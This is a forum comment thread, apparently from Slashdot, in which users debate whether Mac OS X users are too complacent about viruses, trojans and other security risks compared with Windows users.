I'm not saying that OS X is perfect, I'm saying that SO FAR, you shouldn't waste time and money on virus protection. Do regular backups of your important data, that is MUCH more effective and protects against other disasters like hardware malfunctions, loss and theft, fire and stupidity.
.P.S. You dont even know how computers work do you? what are you doing here? a mac virus that erases the hard drive? Macs dont even run in root 99% of the time!!!
Ok, going to skip over the bloviating crap, and address a few very important issues.
Just because the USER does not run as root by default on OSX, does not mean that an overflow or other type of exploit could not gain access to protected areas and execute at the root level.
Go read the Apple security bulletins, they actually explain this fairly well even for non-tech people.
Secondly, do you realize how easy it is to get a Mac user to type in the root password when installing software, and giving a trojan full access to the system? This is something our security people actually use to demostrate the user element in security to companies.
95% of the time, the average Mac Employee gives the fake virus full control when asked to do so, and we issue the root password request very blatently, when it could be embedded into a series where the users normally expects to give root access to the OS, which increases the % of users that give the virus control of the system at root level.
Thirdly, even if a virus is not running as root, it can still delete everything in your user folders, you know, all the documents you created. This is usally important to users for some strange reason.
As for my knowledge of computers and security, figure that out for yourself...
OS X
If it's such a problem, how come Virus companies haven't been creating viruses on the sly to drum up Mac business?
after RTFA, i can't figure out exactly what the mac user is being told to do other than stop being smug. is it that the firewall should be used and system scanned on occassion? is that it? i know mac users who do that already and yet still feel smug. frankly, i don't see how you can ever get mac users to not feel smug until they face a real problem as opposed to a possibility for a problem for which a patch is available prior to it becoming a reality. seems like if people want mac users to not feel smug, they should stop reading /. and work on producing some exploits to prove their case.
Well, while some Mac users ARE pretty smug, I don't feel their faith in OS/X is completely misplaced.
I've been writing code since 1971 and have made money testing security.
As an exercise, I wrote "Plan 9", a UNIX-specific viral application. I turned it loose in a lab containing SCO UNIX, IBM AIX, some Windows machines, a Mac running Finder, a Novell file server, and some NeXT machines. All the systems were on the same subnet and had NFS mounts to each other.
Without specifics (and don't ask...I won't say), the virus was designed to disable login capability...a basic, but effective denial of service attack.
The SCO and IBM machines were toasted. Everything else was unaffected. Now, the NeXT boxes are NOT identical to today's Mac OS, but similar.
I haven't dissected OS/X (yet), but I would guess it's not an easy target. Could someone write code that would rape and pillage a Mac? Absolutely...nothing is bulletproof. But, some things are easier....like Windows...so the Mac community may have some justification in feeling more secure.
FWIW........
I am my own gestalt.
What Bill Thompson fails to point out is any kind of real solution. Virus scanners are mostly reactionary. They scan computers for known virus signatures. Without any known viruses, there's nothing to scan for. What the hell do we do? Even if every Mac user ran a virus scanner, there wouldn't be any "herd immunity", because any virus that comes on the scene will be entirely new.
I think the answer for lack of mac viruses is quite simple. Besides the fact that 95% of the world uses windows, mac users love their computers too much to want to write viruses for it. If anything, they would be writing windows viruses to try to convert windows users to mac. I mean seriously...on average, the mac community is more dedicated than the christian community. I have never met an apple user who hasn't actively tried to convert me.
Of course this leads to the larger question...are mac's safe. I don't really think so. It's safer than windows right now for sure, but I am interested to see the comparison againist Windows Vista.
My brother has an older iMac with five user accounts on it, so if one user gets a virus then only 20% of the user data is at immediate risk (no one in the house knows the admin password - that's my job as family IT guy).
So, in this case, not having admin privledges reduces the damage by 80%. Is that not "substantial"?
TWW
"Encyclopedia" is to "Wikipedia" what "Library" is to "Some people at a bus stop"
I've used Macs since 1986 and I think we are far too smug about virus, trojans and other malware. We think that we are invulnerable, and someone is going to write up a nasty little piece of software that's gonna get us. No doubt about it, and it could even be today. Who knows? There are a number of proprietary antivirus packages (Virex, etc) but there is also a free tool- clamXav which has a Cocoa wrapper around the clamav package. It's not fully integrated yet, e.g., AFAIK you can't automatically pipe e-mail through it from Mail.app, but it's a start.
I already said this in reply to another post, but I'll say it again: OS X is not "obscure". The core OS is open source software (called Darwin) that is based on decades-old BSD code. Cocoa, OS X's most important API has been around since the NextStep days. The stuff on top of Darwin has so far never been successfully exploited, and there has to be some reason for that.
Both Windows and Mac users are blissfully ignorant of proper computer security. Just because *you* give a crap about installing your updates in either Windows or Mac doesn't mean the other 99% of the users do.
This is a 100% mac office. Every workstation here is a mac. There is one lousy windows box left, a web server being phased out and replaced with a LAMP solution. Everything else on the server side is either OS X, freeBSD or Ubuntu. Does that mean my users here know about virus scanning and installing patches as soon as they are available?
Hell no!
They still do the same dumb shit that Windows users do in every other company. They:
1. Ignore automated patches.
2. Disable Virus scanner DAT file updates (yes, we run a virus scanner on our macs).
3. Disable Word Macro protection, then whine when they bring a macro virus from home and infect the other 5 idiots that also turned off the macro protection.
4. Keep 500 (no exaggeration here) spreadsheets on their desktop, then don't at least turn on the auto-arrange, so all 500 spreadsheets (About two years worth of work give or take) are now stacked on top of another.
5. Email 100 MB MP3 recordings of teleconferences, then bitch when the mail server dies.
Etcetera.
These people are no smarter or dumber than the windows users that I have had to work with over the last decade.
The only real difference is that they don't get as many crashes as windows users, so whenever something goes wrong they completely freak out and have a panic attack.
Pedro
----
The Insomniac Coder
My operating system to handle the security part without having to download... Another Browser... Anti-virus software... Anti-spyware software... All of which only partially work. It doesn't excuse stupidity but being cautious in what I download...not to mention having Little Snitch...leaves me feeling rather secure. I like not needing an anti-virus program, keeping my updates up to date and I feel pretty good. Overconfidence or just confidence in a good product...not for me to decide.
My dad bought my niece an HP laptop for Christmas. The next day, I was installing some software (Firefox, AdAware) and got a pop up for "cheap mortgages". She was fiddling with it for all of three hours on Christmas day and got spyware.
Yes, I realize that these are anecdotal stories, but they're pretty typical of the experiences most tech people have in their families.
But, as someone posted earlier, if Macs are 5% of the computer market, why aren't 5% of the viruses and spyware on Macs? That would be tens of thousands, not a few dozen.
You have two hands and one brain, so always code twice as much as you think!
Well, I can see Windows users saying the whole problem of running apps under an account other an "Administrator is actually a very easy one.
3 Easy Steps:
1) Create account named "NotTheAdministrator"
2) Add it to the "Administrators" group.
3) Change all programs running as "Administrator" to run as "NotTheAdministrator"
All the convenience of the existing software without any of it running as Administator.
I think a user should have the right to expect that he can plug his brand new spiffy computer into the Internet without having it infected with some crap within a matter of minutes. I think a user should have a right to expect that his computer is secure without having to run 5 separate security products on it at all times. I think a user should have a right to expect that he can open an email or web page he hasn't visited before without the fear that his computer might be taken over. I think that if your operating system does not live up to these simple measurements, you have failed as a software company.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Security "professionals" work the same way as insurance salesman. They prey on your fear on something that could happen. Things could happen with malware on OS X. Things do happen all the time with malware on Windows. There are approx 800,000,000 Windows users apparently, and 30,000,000 OS X users. Is 30,000,000 clueless Mac users not a tempting target for malware writers? What about 30,000,000 smug Mac users? Perhaps they too fear our smugness. Works for me.
Speaking of smug, the author of this article seems only interested in criticizing Mac users and showing off the fact that he knows what "herd mentality" means. If he's really that concerned, would it have killed him to mention a few security tools (e.g. virus checkers, spyware scanners) that might solve the problem of poor security due to smugness? As far as I could tell the only suggestion was "use the built in firewall"... how insightful!
Shipley put's the virus situation in an interesting perspective:
e s-put-up-or-shut-up.html
http://wilshipley.com/blog/2005/09/mac-os-x-virus
We don't have virus, we're virus free. For now.
I don't think this is the right question. No OS has perfect security, but if you need add-on products to "protect against infection" it's likely that there's something fundamentally flawed with the architecture of the underlying system. Anything that the add-on product can do is somethng that could and should be done by the the underlying system.
The current "state of the art" (or at least, the art that gets all the attention) in virus protection for the "majority" OS involves scanning for patterns of known viruses. But of course, that's a reactive, close-the-barn-door-after-the-cows-have-gone approach. Even if your antivirus software is 100% up to date, there's still a window of vulnerability between the time a new virus is introduced and the time a new detection pattern for your antivirus software becomes available. You could get infected during that window, and the damage and expense that would result (lost data, necessity for complete wipe and reinstall) is just as great as if you had no protection at all. In fact, if you do a system-wide "virus scan" using a conventional antivirus program, and if it detects one that's somehow managed to install itself on your disk, you ought to do a complete wipe and reinstall anyway. No fun.
Yes, as a Mac (and Linux) user, I am smug about security. I'm not necessarily 100% invulnerable, but the immunity I have is based on solid, fundamentally good OS design, not a patchwork of kludges and an unwinnable arms race. And I reject the FA's implication that I'm somehow being lazy or irresponsible by not doing more than this. The notion that security is and must be the ongoing responsibility of the end user is one of several dangerously false ideas which has been foisted on the world by That Other Operating System. Once I've selected a properly-designed product, and as long as I keep it up-to-date with security patches, my job is mostly done. If I and millions of other mere users are supposed to do much more than this, if our security depends on (say) our being vigilant in never clicking on unsafe attachments or on installing and maintaining add-on security products which try to reactively do what the underlying OS can't, then we've got an untenable situation which will never be secure.
I think you would find all three levels of "smug" amongst Mac users, amongst Linux users, and even amongst Windows users, seeing as how we have plenty of issues in the wild that target Microsoft desktops and laptops. OSX is not particularly "good" against malware; it's more like Windows is particularly "bad", and 99% of the Bad Windows is due entirely to Bill's Favorite OS being configured as vulnerable in a default install. This is a problem in the attitude and practice of the OS vendor, not the OS itself.
Were Windows to be more like UNIX, Linux, or OSX in only that one area, we'd all be more secure, and we could all be worrying about more serious vulnerabilities that go beyond attachments, nasty pictures and Active-X agents of doom.
Now, "too smug" about security, I'm not so sure. It definitely depends on who you talk to (and you obviously haven't been talking to any Mac users I've tutored on the subject; they know security is ongoing and requires vigilance on any platform).
Apple themselves are, and always have been, very reluctant to suggest Macs are immune to malware, and even with Windows nearing 100K in virus/worm/trojan instances, they are remarkably silent about what many feel is a significant competitive advantage. OS9 was (and still is) a much more secure OS than OSX; it may well be amongst the most secure ever widely deployed by anyone. Yet, that would be news to a majority of users on any platform, including OS9 users themselves.
Are men "too smug" about Breast Cancer? Certainly they don't "worry" about it, but they too can be victims (not sure about the actual instances, but perhaps 1-10 ratio would be in the ballpark. You could look it up if it's important to you). Yet, it's not on top of their radar, and I don't think you should be insisting that's somehow wrong. There are other things to worry about, plain and simple.
How many copies of Mac AntiVirus software gets sold? By the parent post, it should be none, since the smug would obviously prefer to spend their money on further whitening of their annoyingly bright smiles. Yet, it's widely deployed on home computers (not just corporate boxes) running OSX. I don't know about you, but putting out $50 for what the smug would find to be useless software doesn't jive with the assertion. I also find it hard to believe that Windows users would voluntarily deploy any software at all that cost them money to protect Linux, UNIX or Mac users were the shoe on the other foot.
I wonder if all this smugness is related to former Windows users or to people actually comparing the two platforms while shopping and who chose a different path than they otherwise would have a few years ago? If Linux boxes were available to average consumers (a real problem, still not addressed) would Linux geeks be outnumbered by clueless Linux Lusers, smug about security?
Back in the good ol' days, the Macintosh had notorious security problems. Its habit of "opening" every floppy you stuck in the drive gave it a built-in vector for transmission. Later, with the disastrous port of Word 6.0 to the Macintosh, the Mac was ideal for Macro viruses (.dots masquerading as .docs): they spread just like on the PCs, except that many Mac users were trained (as, alas Windows users are now) not to recognize the distinction between data files and executables, let alone the distinctions among data file types. In addition, the excellent AppleTalk network software made it so easy to share hard drive contents that, once a Word macro got on one Macintosh, it spread to all the others. Heck, back in the day, I remember when network-connected Macintoshes were dubbed "Hackintoshes" and were the vector of choice for, uh, "penetration testing."
You'll recognize that these security weaknesses often come about by the fact that Macintoshes have historically been ahead of PCs in implementation of new technologies and interfaces. Just because a machine blocks many of the common vectors of today doesn't mean it's immune from the unknown. Being on the leading edge has its price. You can't claim to have a supercomputer in a plastic box and have no problems with viruses.
Besides, with the latest generation of security problems, criminal intent has replaced simple malice. What better target for a group of identity thieves than the demographic of Mac users? Come on, if anything is gonna save Mac's market share it's that people are willing to pay a premium for style and simplicity. Mac showed the way for widescale adoption of the PC has a home appliance by playing to the average user's ignorance of how a computer works; Windows has made great strides in this direction, but Apple still has the rep. What better target for your phishing/identity theft/ddos racket than someone who has disposable income, does not know much about computers, and thinks they're immune from such attacks?
As for Linux and Open Source, I'm a big fan of the F/OSS movement, but there seem to be a few misconceptions that get bandied around as fact. For example, when people think F/OSS, they think of code-obsessed geeks working for free in their parents' basement. The best F/OSS projects involve people who are employed specifically to work on them. Another myth, however, is this "many eyes make light work" notion of security. Any project needs coherent centralized direction (some forks are better than others). That means it needs a filtration system for the centralized direction to determine what needs to be done, and to assign people to do it. The more inclusive the filtration system, the more centralized resources get used on community handling, and the less on improving the code base. You can argue that the results are fairly good, but the same is true of Microsoft in the last year or so.
The real way to security, as the Mac people will point out, is a secure design coupled with a flexible and rapid support system. Macs may have the most secure design, but support of their platforms in plugging security holes, or even supporting products more than a year old, has not been stellar: anyone remember that Macintosh wireless spoofing vulnerability from a few years back? For that matter, anyone know anybody who still uses OS X 10.1? Linux, just because it's open and the holes are patched quickly, doesn't by that reason have a super-secure design. There are plenty of reasons why you can prefer your OS to Windows, and there's no disputing that historically, Microsoft seems to have made every "bad choice" regarding security in Windows (and Office) imaginable. But just because Microsoft sucks doesn't make your platform safe. Ignorance and pride are a dangerous combination.
For the record, I've had a PC for over 13 years, and the only infection I ever caught was a Word Macro from a Mac -- and that was easily recognized and disposed with.
"No, Mac users aren't invulnerable. We're simply more secure overall. And we're proud of that."
This may very well be true, and I will bet it is.
Regardless, how do you prove it? There aren't that many people in the world with a combinatino of the 1)knowledge and 2) 'evilness' to create a virus for millions of computers.
What reason would these few people have to make one for an OS with around 2% market share? Why would they spend the amount of time to find a vulnerability and create a method of transportation?
The fact is Windows is more secure than we all think, and OSX is less. When you are the big dog with 97+% market share on the desktop you have a huge target on your back.
Our legendary humbleness. :-)
"There is more worth loving than we have strength to love." - Brian Jay Stanley
I was a sales rep at a smallish computer store. I told a customer that Macs aren't immune to everything, which is why Symantec (amongst others) releases security tools. The customer argued with me, saying Symantec was just trying to squeeze another buck out of people because their product does nothing. I briefly tried to explain the other risks, and how they differ from viruses - but he would have none of it. Practically spitting mad, he stormed out of the store. The customer went back to the local Mac Users Group, and the whole town was aflame with my store's "hater" stance and how we were a big bunch of liars. All the other stores would advertise "the truth about macs" and pretty much rubbing salt in our wounds. How did my store deal with the situation? We sent a mac expert out to the M.U.G. to explain how we were mistaken, and I was fired. My store lost a lot of customers, apparantly.
I think I speak for many Mac users in saying that our smugness (which is never really a good thing) is derived from how much easier it is to be a Mac user these days in the face of all the Windows security threats. It's reinforced, too, by a deeper confusion regarding why so many people feel like they *have* to use Windows. I'm secure in recommending Macs as a more secure alternative - not because I believe that Macs are inherently immune to attack, but because today's reality is that they're at much lower risk, and no matter how much I plead with my friends and relatives they're not diligent about security.
And that's the real problem. I take security measures with my Mac. But many people don't want to learn about or take the time to implement security measures. Windows security would be a whole lot better if every Windows user upgraded to XP SP2, turned on Automatic Updates, and installed a firewall. Add anti-spyware, anti-virus, and a non-admin account and things look even better. Mac and Linux users, at the very least, should have firewalls and should be careful about what they download and run. But by and large, people don't want to bother. And given that, a system that (a) gets fewer attacks and (b) comes configured without root privileges seems like a clear winner to me.
The longer-term challenge is how to manufacture computers that are secure enough out of the box to survive without user intervention...because most users won't take the time.
With Mac users so nauseatingly smug, so herd-vulnerable, and with Linux users (that's me) so superior, so ill-advisedly self-confident, why is it that virus writers don't find us an irresistable target to take down?
[irony]
C'mon virus writers and hackers, what's holding you back? We're missing the fun! I'm missing those pop-up adverts every time I move the cursor! Are we too hard to write viruses for? Is it that I've got everything backed up on tape? Is it because I'm behind a separate firewall machine? I'll give you a clue, it's running Smoothwall : isn't that a challenge to respond to?
We need a control experiment - a fair share of OS X and Linux viruses to see what the infection rates are in a level trial against Windows. Perhaps that will put an end to these arguments.
[/irony]
Right you are. Saying that hackers target windows because of it's market share IS sticking your head in the sand. In my opinion, OSX is a bigger target than windows because writing viruses is about fame. Who's going to be more famous, the guy who writes exploit #72,587 for windows or the guy who writes the FIRST exploit for OSX?
Kiteboarding Gear Mention slashdot and get 10% off!
I'd say Mac users are def. too smug about security, and it's only a matter of time till that smugness is taken advantage of. But for now, it works. You see, what I haven't been able to get is why there aren't any significant virus threats for Macs. Just as there are fanatics for Macs, I've seen people _HATE_ Macs and all that use them with a passion second only to their passion for living. How these people haven't created viruses for Macs is beyond me (Harder to spread since Windows would be a brick wasll if it were a worm, but still worth a try, maybe a bi-OS virus?). It can't be that every good virus maker is a Mac fan. I think OS X has a built in Firewall, but for now, I think I'll be fine not using a virus scanner like much of the rest of the Mac community (I feel like I just admitted my kryptonite....).
In undeveloped countries, the consumer controls the market. In capitalist America, the market controls you.
there are numerous anti virus programs out there for the Mac, but what virus are they scanning for? There are no known viruses for OS X, so how can they update the virus definitions if they have nothing to base it on? They've seen a vulnerability here and there, but nothing has been exploited yet.
First of all, I find that a pretty funny problem to have... the lonliest virus scanner on the planet, just waiting for the first definition to apper on an update (pretty much all virus products auto-update).
Beyond that, virus programs can still check for types of attacks (like "hey, this program is trying to access your startup items or an application bundle"). Also there are a few things to look for - Word Macro viruses. Some of these can still function partially on a Mac depending on what they do.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
I've seen this problem on our university's campus more than a half dozen times (oh, the horror!).
-User reads something about "SSH" to access his machine.
-User turns on SSH
-User also has no imagination with password--uses common dictionary spellings
-User is cracked into with dictionary attack
-Security team shuts down port or blocks MAC after a bank calls to report attacks
-User calls helpdesk
-Consultant re-installs MacOS X and smacks the user about the head and shoulders because they had no business enabling SSH
-User has admin privileges stripped
-Problem solved--for now.
So, the biggest "problem" is, indeed, user ignorance. But, out of the box, I'd say Macs are in pretty good shape against attacks and malware given the current lack (and history) of Mac spyware, trojans, or viruses (none that I know of).
Macs are not impervious, but they enjoy 2 major benefits:
1) There aren't enough of them for a worm to spread quickly or effectively (which is what I'd want if I were in the black arts).
2) They don't come with giant holes from the complacent company who wrote the OS--why work when you can pick the low-hanging fruit from MS?
With the new Intel chips, executeables might find new life in the Mac...but we'll see.
I might know what I'm talkin' about, but then again, this is Slashdot...
The backup computer for our UW Quantum System Engineering Group is a Mac G5. It was suborned and used to attack NASA computers. As a result, the FBI subpoened the entire contents of the computer (Agents came by and cloned the entire disk at the digital level, and yes, we verified their credentials.).
In response to this, our QSE Group decided that we would run a completely open research group. This makes it much simpler for both attackers and friends to learn what we're up to: just go to http://www.mrfm.org/ .
Until you hire a 24-hour security guard, and have no physical connection of your computer to the outside world whatsoever, you are not secure against a determined, professional attack.
More broadly, we tell entering students that if you want to keep a secret, don't tell anyone, don't write it down, and definitely don't store it on a computer. As the FBI agent told us: that's the only security plan that's guaranteed to work and affordable by anyone.
Yup, I'm sitting fat, dumb and happy about the absence of ANY recorded infections of Mac OS X systems.
But what's significant here is to understand the vulnerabilities of Mac OS X. What's pretty clear is that the vulnernabilities that permeate Microsoft products aren't in Mac OS X.
Part of the reason I'm not rushing out to buy Mac antivirus software is that I'm not convinced it's worth the money. I'd assert it's guarding against sources of infections that so far haven't proven out. When there is an actual Mac OS X virus/worm/malware/etc, we'll be able to understand that real, no-sh*t vulnerability and I'll be happy to buy a product that is proven effective against it.
So to those who want me to buy Mac OS anti-virus products, I'd argue two things, which are the classic requriements that the FDA places on medicines:
1. Safe - Many of the Mac OS X products have proven to be much more harmful to overall system reliability, and I don't need some anti-virus software protecting me against malware/virus behavior, by causing the same symptoms of system instability.
2. Effective - Against some clearly validated threat, not hypothetical risks based on vulnerabilities of other platforms.
In some respects, it's like taking medicine against TB, -after- youv'e been vaccinated against TB. Your chances of catching TB are nil without the medicine, and that medicine won't protect you against some other kind of disease, so why bother with the medicine?
dave
On Linux and a guess the Mac you don't have to run as root all the time. I know that can run a windows box without admin rights but it is a real pain. So far on Windows I have yet to find anything like su or sudo. On a Linux box if I have to have root it is so simple to do an su do what I need to do and then exit.
On windows I have to log off and then log in with admin rights. Not running as an admin makes your system less vulnerable.
That being said I have never had my Windows machines get infected with a virus or worm. I do run them behind Linux firewalls, I don't use Outlook, I do use Firefox, and I don't open strange attachments.
See my blog http://ilovecookes.blogspot.com/ for light hearted technical information.
The fact that OS X/*nix is more secure than Windows due to it's smaller user base is just a myth!
Look at web servers for example, the number of Apache boxes out there far outweighs the number of IIS servers, yet there are plenty of IIS virus' where as there has been 1(?) Apache virus (which was a vulnerability in a module - not actually apache). If it was simply a case of going for the largest user base why aren't there more Apache virus' than IIS virus'?
Haydn.
Time is an illusion. Lunchtime doubly so. - Douglas Adams
Because most weren't critical vulnerabilities and there are no exploits. Show me an exploit for a Mac OS X vulnerability. Now, show me one in the wild. Can't? The only thing you have to do to wipe the smug look of a Mac users face is to release an exploit in to the wild.
a g=zdfd.newsfeed
3 75,39155837,00.htm
I actually don't have to do anything that hasn't already been done...
Here is my 2 minute search for a response to your questions specifically.
Proof of concept exploit:
http://news.zdnet.com/2100-3513_22-5189335.html?t
Exploit, infections from not known:
http://news.zdnet.co.uk/internet/security/0,39020
In Wild exploit, known infections:
http://www.macintouch.com/opener.html
I don't have time to do more research to help your denial, but I would suggest you actually do a bit of research yourself and see that OSX is no more perfect than any other OS. PERIOD.
Do hackers have Macs and Software to run on them. Mabie not enough yet. But what about when Intel Macs ship........
Apple has quite a few things going for it in regards to security, which is why we've seen no wild viruses yet:
1) Real user accounts with limited system permissions. Makes it harder for viruses to really worm into the system.
2) No services open by default so there's really no good vector for automatic intrusion - whatever service you pick is going to have a low payback.
But really a very important, and often overlooked feature is (3) - a system updater that people do not disable, because it's not very intrusive.
That is what gives Macs a tremendous immunity advantage as a group, because if any attack vectors are found (either through Safari or services or what have you) Apple can have 90% of the Macs on the planet patched within a week (being really conservative there and assuming that 10% of macs either would have update disabled or otherwise are unable to update for some time for some reason). So even a serious spyware problem that entered through Safari (my bet for the first sucessful attack we would see) would be patched before many people would get hit.
In theory Windows Update could do the same for Windows - but in reality a lot of people disable it as it keeps breaking things or is just plain in the way.
So the reason that Macs have no viruses yet is not because the marketshare is too small (point me to any spammer that would just toss aside a few million zomies if they could use 'em), but because like the borg shield any vulnerabilities are constantly shifting and thus not explotable for long enough to make the attempt worthwhile.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
Bill Thompson: Mac users really shouldn't get complacent, and should use decent security measures.
Slashdot: Kind of hard to install security measures for problems which don't exist, Bill.
No kidding!!! What do you say at this point?
These post are common, I've been reading them on Slashdot, Ars Technica, my newspaper and tech sites around the internet. They usually are initiated by virus vendors trying to be profesisonnal (not sell their product noooo...) and warn us of the potential dangers.
I'm actually pretty sure there are more articles about the fact that MacOSX can be prone to malware than there is malware on the Mac. As a mather of fact, no malware on the Mac yet (MacOSX, classic MacOS had a few prior to os8).
None
Zero
Zilch
There was this "proof of concept" once... you had to download a mp3, which in fact was an executable archive, you had to double-click it in the finder, which almost no one does (drag and drop on app in dock usually), then it would execute (which no mp3 does, you have to be a moron not to be suspicious at that point) and then your MacOS was asking for permission to run the process (cause it was targetting a system component), then at this point, you have to be VERY stupid to write your password in the window and click yes. That was what is considered "proof of concept" on the mac...
A bit more? What are you smoking?
Mod me down. I've got karma to burn.
Talk about being smug....
With the first link, the chain is forged.
Name one.
C'mon. You just spent a lot of time telling us that there are a lot of viruses out there for OS X and that we should just research it. Well, I'm sure you've researched it, so enlighten us, please. Name one.
Oh, I know about the "opener" trojan. A shell script that never went anywhere. BTW here is a much more destructive "Mac OS X trojan" called "runme.sh" that also affects Linux and Unix! Oh my. Here it is, read with caution:
The only viruses I've seen on macs are word macro viruses - namely Claude.ASo, oh wise one, educate me and the rest of use please. I am aware that there are security weaknesses which could be expoited. But so far, none have. I agree, that we have to be vigilant, but for now, you are just talking out of your ass.
"terrorism" and "pedophilia" are the root passwords to the Constitution
A bit more? What are you smoking?
Apparently not the good stuff... *smile*
Perhaps I am resistant, or not prone to the behavior that made you sick.
This is like people who claim that everyone gets AIDS, not just gay men and IV drug users...
I suggest you read Slashdot
OK, let's say that you have a virus. Now, it is visible in your data so you restore them from backup. If it is also possible that the programs you use (that you say is not as valuable as the OS) could be infected, well your data files could get re-infected. So you re-install your data from backup. And it gets re-infected....
See where this is going yet?
If you trash your data (whether it is backed up or not) with a virus, you want to KNOW that your system can be trusted not to put the virus back in. UNIX and the user/admin separation makes this possible. Windows admin rights being widely necessary means that you cannot.
So your own data being trashed may be more damaging for that one instance than the OS being trashed, but if you don't want to have your data re-infected, you will need to reinstall your OS too.
Apple has done a very good job at fixing their specific errors and security issues for MacOS X, but additionally since they are building off an open-source software base they inherit any security problems from all the unerlying applications that run on their system. But even so they have been good at contributing to fixes for those projects, and good at packaging fixes for MacOS X once those projects post a fix for their problems.
So...should the average MacOS X user be concerned about security problems? Sure, and they should make an effort to acknowledge fixes that happen in Software Update. Should they worry about worms and malware? Of course, though there are only a handful of those and they mostly require superuser access to run. Should they be concerned with viruses? What...for the proofs-of-concept not actually in the wild? Not really.
In comparison to the numbers of unpatched Windows security errors, thousands of worms and malware for Windows, and thousands of viruses for Windows...and all the paranoia that generates (rightfully!) in Windows users? Any non-Windows user, not just the MacOS X ones, have some right to be 'smug'.
At the risk of repeating myself, on this subject, I recently answered a query raised during a Chronicle of Higher Education colloquy. I believe it touches on the major issues here.
Question from Lisa L. Spangenberg, UCLA:
Given that there are no viruses or Trojan horses for the current Macintosh system, OS X 10.3, and given that it is essentially UNIX, and given that the most common applications (Microsoft Office Suite, Adobe applications) work very well on OS X, why don't more institutions adopt Macs and encourage faculty to use them?
Gregory A. Jackson:
Well, first of all, there are viruses and Trojans that afflict MacOS, witness Apple's periodic release of security fixes to counteract them.
First, that isn't true, regarding viruses. To date, there are no known viruses that specifically target Mac OS X. Last week's "trojan" was nothing more than an application with a different icon and misleading name that displayed a dialog box (which was an example posted to a USENET Mac programming group to illustrate this fact that has been known and possible on Mac OS for over twenty years; an antivirus vendor apparently thought this an appropriate time to dress it up, incorrectly, as some new, terrible exploit easily adapted for malicious means, when in reality it's nothing more than an application).
If you're referring more broadly to security issues in general, almost all of the security and security-related updates for Mac OS X to date have been updates for primarily server-type services that ship with the OS, all of which are disabled by default, and the lion's share of which are never even enabled, much less touched, on the vast majority of systems. I'm not saying that they should be ignored, but Apple's comprehensive and swift response to the most minor security issues does not rise to the level of the staggeringly numerous, sometimes completely automated, remote exploits, worms, and so on for Windows. It is no longer possible to even get through a full installation Windows XP on a machine connected to a public network without it being exploited before you even have a chance to patch it.
It's definitely possible for Mac OS X to have viruses, worms, trojans, and other malware - Mac OS X is not invulnerable, and no sensible person would claim it to be. But the underlying philosophical design principles are fundamentally more secure than Windows, period. Since the major ingredient for the success of a worm or virus is some ability to spread, witness the fact that there is no way with anything built into Mac OS X to perform automated propagation of a virus, and no current known ways to exploit a machine remotely, not to mention that potentially exploitable network services are disabled to begin with anyway (and remain that way unless explicitly enabled), a stark contrast to Windows. Any hope for automatic propagation would require a comparatively high level of sophistication, and perhaps even its own mail server - not to mention some intrinsic vulnerability to exploit. On the other hand, there are still, to this moment, unfixed vulnerabilities in certain versions of Outlook that will spread certain virus variants simply by previewing a message, and nothing more. There is simply no equivalent to this on any other platform. Microsoft's track record and attitude on security (though admittedly much improved) versus other vendors speaks volumes on this topic.
It takes work and thought to do security, and do it right. Ease of use and security aren't mutually exclusive. The key is to make security easy to use, and Apple has so far been on the right road with Mac OS X.
But the small installed base of Macs makes them an unexciting, low-visibility target for the bad guys, and so the weaknesses don't get exploited much.
The marketshare argument only goes so far. This seems to be a version of the "Macs have no software" argument. It is indeed true
There is an anti-spyware product for the Mac OS world called "MacScan". I interviewed the President and COO of SecureMac, the developers, on the last edition of Radio MacGuys
http://www.macguys.com/
wherever I go, there I am.
So, in this case, not having admin privledges reduces the damage by 80%. Is that not "substantial"?
I don't think that's a reasonable measure. If the one-fifth of the family's data that got snooped happened to include information providing access to bank accounts, personal financial data, etc., then the damage to the entire family's well being could be ruinous. Is a twelve year old losing her MySpace bookmarks and P2P downloads really no different, to you, than someone having their doctoral thesis or college application essay trashed? Because no, not everyone backs up like they're supposed to, not even the Really Important Stuff.
Don't disappoint your bird dog. Go to the range.
Safer? I guess, except in the past year Apple released more security and exploit fixes for OSX than Microsoft did for WindowsXP...
So again how is it a safer OS if these exploits existed in the first place?
Apple updates its OS more, so it must be less reliable?
This is the logical equivalent of pulling the CarFax report on two cars and deciding against the car that's had all its regularly scheduled maintenance since it must obviously be less reliable than the car that's only been taken to the shop when something broke down.
There's a difference between the things Apple fixes and the things Microsoft fixes.
If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").
http://www.penny-arcade.com/comic/2002/07/12
I believe Homer Simpson said it best: "It's funny 'cause it's true."
OSX users shouldn't feel invulnerable, just as the article points out. They still need to use hard to guess passwords, and shouldn't just allow any old product to install software (like a musci CD) without know what gets installed. The feeling of invulnerability itself is a problem, leading to lax security practices.
OSX isn't invulnerable with respect to security - just somewhat decent.
"We are all geniuses when we dream"
- E.M. Cioran
Here, here!
So, is there a profile of a Mac virus writer???
Yes, you can usually find traces of red and white fur on his clothing.
That's because he usually sits right between Santa Clause and the Easer Bunny.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
From a design perspective, both Windows and OSX have an innate design flaw that can quickly render a system vulnerable - they encourage and support the wanton installation of thirdparty software downloaded from un-quarantined, un checked internet addresses.
We have millions of users taking websites on strictly surface appearances, if lucky by reccomendation from a friend or external corporation. Phishing proves this to be totally foolish, yet the culture of seeking and installing applications has not yet wisened up.
A key reason why I'd be very reluctant to use either OSX or Windows on machines that host data I care about, is precisely because they don't offer useable package management (while trying OSX for a few months I attempted to make a go of Fink, but frankly it's unuseable).
When I install software on a Debian (Ubuntu, Xandros, Linspire) system (for instance), there's a key exchange, I can check md5sums and I know a large number of people have signed off the package, approving it for download and installation to the best of their knowledge.* This application will also dynamically resource existing Libraries on my machine, as opposed to scattering duplicates all over the place (as is the case with *.dmg and (IIRC)
The day OSX and Windows application developers 'subscribe' their applications to a core pool of packages that is gone over with a fine-tooth comb, is the day that both OS's will be on the road to being safe for general public use. *Ironic perhaps, that package-management is often cited as an impediment to the uptake of the platform despite being brainlessly easy to use (as is the case with Debian systems). Go figure
When looking at theories stating that if OS X had larger market share than windows we would see many more OS X viruses one might thing this is a reasonable assumption. The problem with thinking in this way is that it uses Windows as it's case example. With windows as the only data set for comparison there is no evidence to support that with similar market share we would see a dramatic increase of viruses on OS X.
/" and I might listen.
You can definitely argue that there might be more ATTEMPTS at writing more viruses/malware/ect due to a percieved increase in the target market size, but the differences between windows and OS X are such that you really can't say that because with X product Y happened, so with A product Y will also happen.
